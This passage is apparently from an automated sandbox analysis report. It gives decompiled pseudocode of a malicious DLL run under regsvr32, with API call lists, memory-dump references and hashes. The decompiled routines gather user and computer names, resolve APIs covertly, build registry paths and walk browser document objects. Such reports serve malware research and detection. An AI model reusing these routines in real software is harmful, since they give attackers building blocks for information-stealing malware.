                    								} else {
                    									_t39 =  *0x4f9a320; // 0xb2d5a8
                    									_t11 = _t39 + 0x4f9b779; // 0x6c43775a
                    									_t41 = GetProcAddress(_t48, _t11);
                    									 *(_t54 + 0x1c) = _t41;
                    									if(_t41 == 0) {
                    										goto L8;
                    									} else {
                    										 *((intOrPtr*)(_t54 + 4)) = _a4;
                    										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                    										_t44 = E04F9462B(_t54, _a8);
                    										_v8 = _t44;
                    										if(_t44 != 0) {
                    											goto L8;
                    										} else {
                    											 *_a12 = _t54;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _v8;
                    			}

                    APIs
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04F91986,?,?,?,?,00000000,00000000), ref: 04F96274
                    • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04F96296
                    • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04F962AC
                    • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04F962C2
                    • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04F962D8
                    • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04F962EE
                      • Part of subcall function 04F9462B: memset.NTDLL ref: 04F946AA
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: AddressProc$AllocateHandleHeapModulememset
                    • String ID:
                    • API String ID: 1886625739-0
                    • Opcode ID: ec7fa86c0b74e3002b79ae0ea8f10e9f5f80f67f8423d03343cb49768540f65c
                    • Instruction ID: 0d5c410cf355e2c504d6c25e1ab6804ce16db89a4008115e6152ef42ebce03f5
                    • Opcode Fuzzy Hash: ec7fa86c0b74e3002b79ae0ea8f10e9f5f80f67f8423d03343cb49768540f65c
                    • Instruction Fuzzy Hash: F6212CB1A0024AAFFB20DF69E884E5A77ECFB08744B054529E909C7301E779FD068B70
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 88%
                    			E04F92B1E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                    				signed int _v8;
                    				char _v12;
                    				signed int* _v16;
                    				char _v284;
                    				void* __esi;
                    				char* _t59;
                    				intOrPtr* _t60;
                    				intOrPtr _t64;
                    				char _t65;
                    				intOrPtr _t68;
                    				intOrPtr _t69;
                    				intOrPtr _t71;
                    				void* _t73;
                    				signed int _t81;
                    				void* _t91;
                    				void* _t92;
                    				char _t98;
                    				signed int* _t100;
                    				intOrPtr* _t101;
                    				void* _t102;
                    
                    				_t92 = __ecx;
                    				_v8 = _v8 & 0x00000000;
                    				_t98 = _a16;
                    				if(_t98 == 0) {
                    					__imp__( &_v284,  *0x4f9a3dc);
                    					_t91 = 0x80000002;
                    					L6:
                    					_t59 = E04F95406( &_v284,  &_v284);
                    					_a8 = _t59;
                    					if(_t59 == 0) {
                    						_v8 = 8;
                    						L29:
                    						_t60 = _a20;
                    						if(_t60 != 0) {
                    							 *_t60 =  *_t60 + 1;
                    						}
                    						return _v8;
                    					}
                    					_t101 = _a24;
                    					if(E04F97488(_t92, _t97, _t101, _t91, _t59) != 0) {
                    						L27:
                    						E04F917AB(_a8);
                    						goto L29;
                    					}
                    					_t64 =  *0x4f9a318; // 0x5ac9d58
                    					_t16 = _t64 + 0xc; // 0x5ac9e7a
                    					_t65 = E04F95406(_t64,  *_t16);
                    					_a24 = _t65;
                    					if(_t65 == 0) {
                    						L14:
                    						_t29 = _t101 + 0x14; // 0x102
                    						_t33 = _t101 + 0x10; // 0x3d04f990
                    						if(E04F95B98(_t97,  *_t33, _t91, _a8,  *0x4f9a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                    							_t68 =  *0x4f9a320; // 0xb2d5a8
                    							if(_t98 == 0) {
                    								_t35 = _t68 + 0x4f9ba3f; // 0x4d4c4b48
                    								_t69 = _t35;
                    							} else {
                    								_t34 = _t68 + 0x4f9b8e7; // 0x55434b48
                    								_t69 = _t34;
                    							}
                    							if(E04F9266A(_t69,  *0x4f9a3d4,  *0x4f9a3d8,  &_a24,  &_a16) == 0) {
                    								if(_t98 == 0) {
                    									_t71 =  *0x4f9a320; // 0xb2d5a8
                    									_t44 = _t71 + 0x4f9b846; // 0x74666f53
                    									_t73 = E04F95406(_t44, _t44);
                    									_t99 = _t73;
                    									if(_t73 == 0) {
                    										_v8 = 8;
                    									} else {
                    										_t47 = _t101 + 0x10; // 0x3d04f990
                    										E04F934EE( *_t47, _t91, _a8,  *0x4f9a3d8, _a24);
                    										_t49 = _t101 + 0x10; // 0x3d04f990
                    										E04F934EE( *_t49, _t91, _t99,  *0x4f9a3d0, _a16);
                    										E04F917AB(_t99);
                    									}
                    								} else {
                    									_t40 = _t101 + 0x10; // 0x3d04f990
                    									E04F934EE( *_t40, _t91, _a8,  *0x4f9a3d8, _a24);
                    									_t43 = _t101 + 0x10; // 0x3d04f990
                    									E04F934EE( *_t43, _t91, _a8,  *0x4f9a3d0, _a16);
                    								}
                    								if( *_t101 != 0) {
                    									E04F917AB(_a24);
                    								} else {
                    									 *_t101 = _a16;
                    								}
                    							}
                    						}
                    						goto L27;
                    					}
                    					_t21 = _t101 + 0x10; // 0x3d04f990
                    					_t81 = E04F91BC5( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                    					if(_t81 == 0) {
                    						_t100 = _v16;
                    						if(_v12 == 0x28) {
                    							 *_t100 =  *_t100 & _t81;
                    							_t26 = _t101 + 0x10; // 0x3d04f990
                    							E04F95B98(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                    						}
                    						E04F917AB(_t100);
                    						_t98 = _a16;
                    					}
                    					E04F917AB(_a24);
                    					goto L14;
                    				}
                    				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                    					goto L29;
                    				} else {
                    					_t97 = _a8;
                    					E04F97961(_t98, _a8,  &_v284);
                    					__imp__(_t102 + _t98 - 0x117,  *0x4f9a3dc);
                    					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                    					_t91 = 0x80000003;
                    					goto L6;
                    				}
                    			}

                    APIs
                    • StrChrA.SHLWAPI(04F91850,0000005F,00000000,00000000,00000104), ref: 04F92B51
                    • lstrcpy.KERNEL32(?,?), ref: 04F92B7E
                      • Part of subcall function 04F95406: lstrlen.KERNEL32(?,00000000,05AC9D58,00000000,04F93C77,05AC9F7B,69B25F44,?,?,?,?,69B25F44,00000005,04F9A00C,4D283A53,?), ref: 04F9540D
                      • Part of subcall function 04F95406: mbstowcs.NTDLL ref: 04F95436
                      • Part of subcall function 04F95406: memset.NTDLL ref: 04F95448
                      • Part of subcall function 04F934EE: lstrlenW.KERNEL32(?,?,?,04F92CE7,3D04F990,80000002,04F91850,04F95F20,74666F53,4D4C4B48,04F95F20,?,3D04F990,80000002,04F91850,?), ref: 04F93513
                      • Part of subcall function 04F917AB: HeapFree.KERNEL32(00000000,00000000,04F92976,00000000,?,?,00000000), ref: 04F917B7
                    • lstrcpy.KERNEL32(?,00000000), ref: 04F92BA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                    • String ID: ($\
                    • API String ID: 3924217599-1512714803
                    • Opcode ID: e125e10dd1e4558b74f8cdaad68849cba4e70d449a273fcef980ec4328208586
                    • Instruction ID: 5d7c3c2f42f550aa698ec862158323c22608026218ee896b6b023853f8237b44
                    • Opcode Fuzzy Hash: e125e10dd1e4558b74f8cdaad68849cba4e70d449a273fcef980ec4328208586
                    • Instruction Fuzzy Hash: 2951493690020EFFFF229FA4EC40E9A37F9EB08314F158965F91596160DB36ED16AB10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E04F94DFF() {
                    				void* _v0;
                    				void** _t3;
                    				void** _t5;
                    				void** _t7;
                    				void** _t8;
                    				void* _t10;
                    
                    				_t3 =  *0x4f9a3cc; // 0x5ac95b0
                    				__imp__( &(_t3[0x10]));
                    				while(1) {
                    					_t5 =  *0x4f9a3cc; // 0x5ac95b0
                    					_t1 =  &(_t5[0x16]); // 0x0
                    					if( *_t1 == 0) {
                    						break;
                    					}
                    					Sleep(0xa);
                    				}
                    				_t7 =  *0x4f9a3cc; // 0x5ac95b0
                    				_t10 =  *_t7;
                    				if(_t10 != 0 && _t10 != 0x4f9b81a) {
                    					HeapFree( *0x4f9a2d8, 0, _t10);
                    					_t7 =  *0x4f9a3cc; // 0x5ac95b0
                    				}
                    				 *_t7 = _v0;
                    				_t8 =  &(_t7[0x10]);
                    				__imp__(_t8);
                    				return _t8;
                    			}









                    APIs
                    • RtlEnterCriticalSection.NTDLL(05AC9570), ref: 04F94E08
                    • Sleep.KERNEL32(0000000A), ref: 04F94E12
                    • HeapFree.KERNEL32(00000000), ref: 04F94E40
                    • RtlLeaveCriticalSection.NTDLL(05AC9570), ref: 04F94E55
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: 2482aea0e22c0902fa24b213455ee20ff87721649a92cd685bc81dc11c391bc6
                    • Instruction ID: ca3e4ee74be8667b3ba097ba5d815d527e1439e4b6190ea7b69aa40b19bd4d88
                    • Opcode Fuzzy Hash: 2482aea0e22c0902fa24b213455ee20ff87721649a92cd685bc81dc11c391bc6
                    • Instruction Fuzzy Hash: 64F0DAB4B4414AAFFB189F65F949E1677F5EB58301B058009EC12D73A0CA7AEC02CA24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04F94B71() {
                    				long _v8;
                    				long _v12;
                    				int _v16;
                    				long _t39;
                    				long _t43;
                    				signed int _t47;
                    				signed int _t52;
                    				int _t56;
                    				int _t57;
                    				char* _t63;
                    				short* _t66;
                    
                    				_v16 = 0;
                    				_v8 = 0;
                    				GetUserNameW(0,  &_v8);
                    				_t39 = _v8;
                    				if(_t39 != 0) {
                    					_v12 = _t39;
                    					_v8 = 0;
                    					GetComputerNameW(0,  &_v8);
                    					_t43 = _v8;
                    					if(_t43 != 0) {
                    						_v12 = _v12 + _t43 + 2;
                    						_t63 = E04F963FD(_v12 + _t43 + 2 << 2);
                    						if(_t63 != 0) {
                    							_t47 = _v12;
                    							_t66 = _t63 + _t47 * 2;
                    							_v8 = _t47;
                    							if(GetUserNameW(_t66,  &_v8) == 0) {
                    								L7:
                    								E04F917AB(_t63);
                    							} else {
                    								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
                    								_t52 = _v8;
                    								_v12 = _v12 - _t52;
                    								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
                    									goto L7;
                    								} else {
                    									_t56 = _v12 + _v8;
                    									_v12 = _t56;
                    									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t56 + 2, 0, 0);
                    									_v8 = _t57;
                    									if(_t57 == 0) {
                    										goto L7;
                    									} else {
                    										_t63[_t57] = 0;
                    										_v16 = _t63;
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _v16;
                    			}














                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04F94B85
                    • GetComputerNameW.KERNEL32(00000000,?), ref: 04F94BA1
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 04F94BDB
                    • GetComputerNameW.KERNEL32(?,?), ref: 04F94BFD
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,?,00000000,00000040,00000000,00000000), ref: 04F94C20
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                    • String ID:
                    • API String ID: 3850880919-0
                    • Opcode ID: 66510738e62f9dbd7d6fab22767e25d86c7a1c6900baa2cb1139ff8dea65438e
                    • Instruction ID: fb522507fee9db31ede9621096189fad7a777af06e5dd229269becdf30f21c16
                    • Opcode Fuzzy Hash: 66510738e62f9dbd7d6fab22767e25d86c7a1c6900baa2cb1139ff8dea65438e
                    • Instruction Fuzzy Hash: 5121DAB1D00208FFDB11DFA9D984CAEBBF8EE54304B50456AE501E7200EA34AF46DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04F95A5A(intOrPtr _a4) {
                    				void* _t2;
                    				long _t4;
                    				void* _t5;
                    				long _t6;
                    				void* _t7;
                    				void* _t13;
                    
                    				_t2 = CreateEventA(0, 1, 0, 0);
                    				 *0x4f9a30c = _t2;
                    				if(_t2 == 0) {
                    					return GetLastError();
                    				}
                    				_t4 = GetVersion();
                    				if(_t4 != 5) {
                    					L4:
                    					if(_t13 <= 0) {
                    						_t5 = 0x32;
                    						return _t5;
                    					}
                    					L5:
                    					 *0x4f9a2fc = _t4;
                    					_t6 = GetCurrentProcessId();
                    					 *0x4f9a2f8 = _t6;
                    					 *0x4f9a304 = _a4;
                    					_t7 = OpenProcess(0x10047a, 0, _t6);
                    					 *0x4f9a2f4 = _t7;
                    					if(_t7 == 0) {
                    						 *0x4f9a2f4 =  *0x4f9a2f4 | 0xffffffff;
                    					}
                    					return 0;
                    				}
                    				if(_t4 > 0) {
                    					goto L5;
                    				}
                    				_t13 = _t4 - _t4;
                    				goto L4;
                    			}









                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04F94603,?), ref: 04F95A62
                    • GetVersion.KERNEL32 ref: 04F95A71
                    • GetCurrentProcessId.KERNEL32 ref: 04F95A88
                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04F95AA5
                    • GetLastError.KERNEL32 ref: 04F95AC4
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                    • String ID:
                    • API String ID: 2270775618-0
                    • Opcode ID: 743301531035f939640e254e3f674af58efe43028512429b12767e6ab77f7636
                    • Instruction ID: 91c6650b88ab49eac4c8e64613ba424b1556e1fb0108977c128f795df8fbe6ed
                    • Opcode Fuzzy Hash: 743301531035f939640e254e3f674af58efe43028512429b12767e6ab77f7636
                    • Instruction Fuzzy Hash: B6F04FB1F82309BFEF259F35B949F143BA1E704751F014519E526CA2D0DAB95C42CB1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 46%
                    			E04F93D67(intOrPtr* __eax) {
                    				void* _v8;
                    				WCHAR* _v12;
                    				void* _v16;
                    				char _v20;
                    				void* _v24;
                    				intOrPtr _v28;
                    				void* _v32;
                    				intOrPtr _v40;
                    				short _v48;
                    				intOrPtr _v56;
                    				short _v64;
                    				intOrPtr* _t54;
                    				intOrPtr* _t56;
                    				intOrPtr _t57;
                    				intOrPtr* _t58;
                    				intOrPtr* _t60;
                    				void* _t61;
                    				intOrPtr* _t63;
                    				intOrPtr* _t65;
                    				intOrPtr* _t67;
                    				intOrPtr* _t69;
                    				intOrPtr* _t71;
                    				intOrPtr* _t74;
                    				intOrPtr* _t76;
                    				intOrPtr _t78;
                    				intOrPtr* _t82;
                    				intOrPtr* _t86;
                    				intOrPtr _t102;
                    				intOrPtr _t108;
                    				void* _t117;
                    				void* _t121;
                    				void* _t122;
                    				intOrPtr _t129;
                    
                    				_t122 = _t121 - 0x3c;
                    				_push( &_v8);
                    				_push(__eax);
                    				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                    				if(_t117 >= 0) {
                    					_t54 = _v8;
                    					_t102 =  *0x4f9a320; // 0xb2d5a8
                    					_t5 = _t102 + 0x4f9b038; // 0x3050f485
                    					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                    					_t56 = _v8;
                    					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                    					if(_t117 >= 0) {
                    						__imp__#2(0x4f99290);
                    						_v28 = _t57;
                    						if(_t57 == 0) {
                    							_t117 = 0x8007000e;
                    						} else {
                    							_t60 = _v32;
                    							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                    							_t86 = __imp__#6;
                    							_t117 = _t61;
                    							if(_t117 >= 0) {
                    								_t63 = _v24;
                    								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                    								if(_t117 >= 0) {
                    									_t129 = _v20;
                    									if(_t129 != 0) {
                    										_v64 = 3;
                    										_v48 = 3;
                    										_v56 = 0;
                    										_v40 = 0;
                    										if(_t129 > 0) {
                    											while(1) {
                    												_t67 = _v24;
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												_t122 = _t122;
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												asm("movsd");
                    												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                    												if(_t117 < 0) {
                    													goto L16;
                    												}
                    												_t69 = _v8;
                    												_t108 =  *0x4f9a320; // 0xb2d5a8
                    												_t28 = _t108 + 0x4f9b0bc; // 0x3050f1ff
                    												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                    												if(_t117 >= 0) {
                    													_t74 = _v16;
                    													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                    													if(_t117 >= 0 && _v12 != 0) {
                    														_t78 =  *0x4f9a320; // 0xb2d5a8
                    														_t33 = _t78 + 0x4f9b078; // 0x76006f
                    														if(lstrcmpW(_v12, _t33) == 0) {
                    															_t82 = _v16;
                    															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                    														}
                    														 *_t86(_v12);
                    													}
                    													_t76 = _v16;
                    													 *((intOrPtr*)( *_t76 + 8))(_t76);
                    												}
                    												_t71 = _v8;
                    												 *((intOrPtr*)( *_t71 + 8))(_t71);
                    												_v40 = _v40 + 1;
                    												if(_v40 < _v20) {
                    													continue;
                    												}
                    												goto L16;
                    											}
                    										}
                    									}
                    								}
                    								L16:
                    								_t65 = _v24;
                    								 *((intOrPtr*)( *_t65 + 8))(_t65);
                    							}
                    							 *_t86(_v28);
                    						}
                    						_t58 = _v32;
                    						 *((intOrPtr*)( *_t58 + 8))(_t58);
                    					}
                    				}
                    				return _t117;
                    			}




































                    APIs
                    • SysAllocString.OLEAUT32(04F99290), ref: 04F93DB7
                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04F93E99
                    • SysFreeString.OLEAUT32(00000000), ref: 04F93EB2
                    • SysFreeString.OLEAUT32(?), ref: 04F93EE1
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: String$Free$Alloclstrcmp
                    • String ID:
                    • API String ID: 1885612795-0
                    • Opcode ID: 4ba8959f21c8f28a4ba696faf1777750794b7ee98cf3dbba2f624da6b8fcf5ea
                    • Instruction ID: 2b80eaea115e1ae14c8e12732e439dc0265f162590ccccaba39cad6d3c2c272c
                    • Opcode Fuzzy Hash: 4ba8959f21c8f28a4ba696faf1777750794b7ee98cf3dbba2f624da6b8fcf5ea
                    • Instruction Fuzzy Hash: 0B514F75D0051AEFDF11EFA8C88889EB7B5FF89704B144598E915EB210D771AD06CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E04F9420F(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                    				intOrPtr _v8;
                    				intOrPtr _v12;
                    				signed int _v16;
                    				void _v156;
                    				void _v428;
                    				void* _t55;
                    				unsigned int _t56;
                    				signed int _t66;
                    				signed int _t74;
                    				void* _t76;
                    				signed int _t79;
                    				void* _t81;
                    				void* _t92;
                    				void* _t96;
                    				signed int* _t99;
                    				signed int _t101;
                    				signed int _t103;
                    				void* _t107;
                    
                    				_t92 = _a12;
                    				_t101 = __eax;
                    				_t55 = E04F925C1(_a16, _t92);
                    				_t79 = _t55;
                    				if(_t79 == 0) {
                    					L18:
                    					return _t55;
                    				}
                    				_t56 =  *(_t92 + _t79 * 4 - 4);
                    				_t81 = 0;
                    				_t96 = 0x20;
                    				if(_t56 == 0) {
                    					L4:
                    					_t97 = _t96 - _t81;
                    					_v12 = _t96 - _t81;
                    					E04F92E5D(_t79,  &_v428);
                    					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04F9375F(_t101,  &_v428, _a8, _t96 - _t81);
                    					E04F9375F(_t79,  &_v156, _a12, _t97);
                    					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                    					_t66 = E04F92E5D(_t101, 0x4f9a1d0);
                    					_t103 = _t101 - _t79;
                    					_a8 = _t103;
                    					if(_t103 < 0) {
                    						L17:
                    						E04F92E5D(_a16, _a4);
                    						E04F91212(_t79,  &_v428, _a4, _t97);
                    						memset( &_v428, 0, 0x10c);
                    						_t55 = memset( &_v156, 0, 0x84);
                    						goto L18;
                    					}
                    					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                    					do {
                    						if(_v8 != 0xffffffff) {
                    							_push(1);
                    							_push(0);
                    							_push(0);
                    							_push( *_t99);
                    							L04F9818A();
                    							_t74 = _t66 +  *(_t99 - 4);
                    							asm("adc edx, esi");
                    							_push(0);
                    							_push(_v8 + 1);
                    							_push(_t92);
                    							_push(_t74);
                    							L04F98184();
                    							if(_t92 > 0 || _t74 > 0xffffffff) {
                    								_t74 = _t74 | 0xffffffff;
                    								_v16 = _v16 & 0x00000000;
                    							}
                    						} else {
                    							_t74 =  *_t99;
                    						}
                    						_t106 = _t107 + _a8 * 4 - 0x1a8;
                    						_a12 = _t74;
                    						_t76 = E04F92EE3(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                    						while(1) {
                    							 *_t99 =  *_t99 - _t76;
                    							if( *_t99 != 0) {
                    								goto L14;
                    							}
                    							L13:
                    							_t92 =  &_v156;
                    							if(E04F95776(_t79, _t92, _t106) < 0) {
                    								break;
                    							}
                    							L14:
                    							_a12 = _a12 + 1;
                    							_t76 = E04F94A1C(_t79,  &_v156, _t106, _t106);
                    							 *_t99 =  *_t99 - _t76;
                    							if( *_t99 != 0) {
                    								goto L14;
                    							}
                    							goto L13;
                    						}
                    						_a8 = _a8 - 1;
                    						_t66 = _a12;
                    						_t99 = _t99 - 4;
                    						 *(0x4f9a1d0 + _a8 * 4) = _t66;
                    					} while (_a8 >= 0);
                    					_t97 = _v12;
                    					goto L17;
                    				}
                    				while(_t81 < _t96) {
                    					_t81 = _t81 + 1;
                    					_t56 = _t56 >> 1;
                    					if(_t56 != 0) {
                    						continue;
                    					}
                    					goto L4;
                    				}
                    				goto L4;
                    			}





















                    APIs
                    • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04F942C2
                    • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04F942D8
                    • memset.NTDLL ref: 04F94381
                    • memset.NTDLL ref: 04F94397
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmp
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmp
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: memset$_allmul_aulldiv
                    • String ID:
                    • API String ID: 3041852380-0
                    • Opcode ID: b518ca590cc952557319b2b6919a0842a802d25412c06274c429bb209c04a80e
                    • Instruction ID: 871ebc9537c6d3fc4a8831531e56056d4c47399adb697352679029322081a52d
                    • Opcode Fuzzy Hash: b518ca590cc952557319b2b6919a0842a802d25412c06274c429bb209c04a80e
                    • Instruction Fuzzy Hash: 65419F31A00219ABFF14AE68DC80BEE77A5EF55314F104569A919A7280DB70BE468B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 42%
                    			E04F9135F(void* __eax, void* __ecx) {
                    				char _v8;
                    				void* _v12;
                    				intOrPtr _v16;
                    				char _v20;
                    				void* __esi;
                    				void* _t30;
                    				intOrPtr _t38;
                    				intOrPtr* _t39;
                    				intOrPtr* _t41;
                    				void* _t54;
                    				long _t64;
                    				void* _t67;
                    				void* _t69;
                    
                    				_t58 = __ecx;
                    				_t67 = __eax;
                    				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                    					L2:
                    					_t30 = _t67;
                    					_pop(_t68);
                    					_t69 = _t30;
                    					_t64 = 0;
                    					ResetEvent( *(_t69 + 0x1c));
                    					_push( &_v8);
                    					_push(4);
                    					_push( &_v20);
                    					_push( *((intOrPtr*)(_t69 + 0x18)));
                    					if( *0x4f9a164() != 0) {
                    						L9:
                    						if(_v8 == 0) {
                    							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                    						} else {
                    							 *0x4f9a174(0, 1,  &_v12);
                    							if(0 != 0) {
                    								_t64 = 8;
                    							} else {
                    								_t38 = E04F963FD(0x1000);
                    								_v16 = _t38;
                    								if(_t38 == 0) {
                    									_t64 = 8;
                    								} else {
                    									_push(0);
                    									_push(_v8);
                    									_push( &_v20);
                    									while(1) {
                    										_t41 = _v12;
                    										_t61 =  *_t41;
                    										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                    										ResetEvent( *(_t69 + 0x1c));
                    										_push( &_v8);
                    										_push(0x1000);
                    										_push(_v16);
                    										_push( *((intOrPtr*)(_t69 + 0x18)));
                    										if( *0x4f9a164() != 0) {
                    											goto L17;
                    										}
                    										_t64 = GetLastError();
                    										if(_t64 == 0x3e5) {
                    											_t64 = E04F95867( *(_t69 + 0x1c), _t61, 0xffffffff);
                    											if(_t64 == 0) {
                    												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                    												if(_t64 == 0) {
                    													goto L17;
                    												}
                    											}
                    										}
                    										L19:
                    										E04F917AB(_v16);
                    										if(_t64 == 0) {
                    											_t64 = E04F916E7(_v12, _t69);
                    										}
                    										goto L22;
                    										L17:
                    										_t64 = 0;
                    										if(_v8 != 0) {
                    											_push(0);
                    											_push(_v8);
                    											_push(_v16);
                    											continue;
                    										}
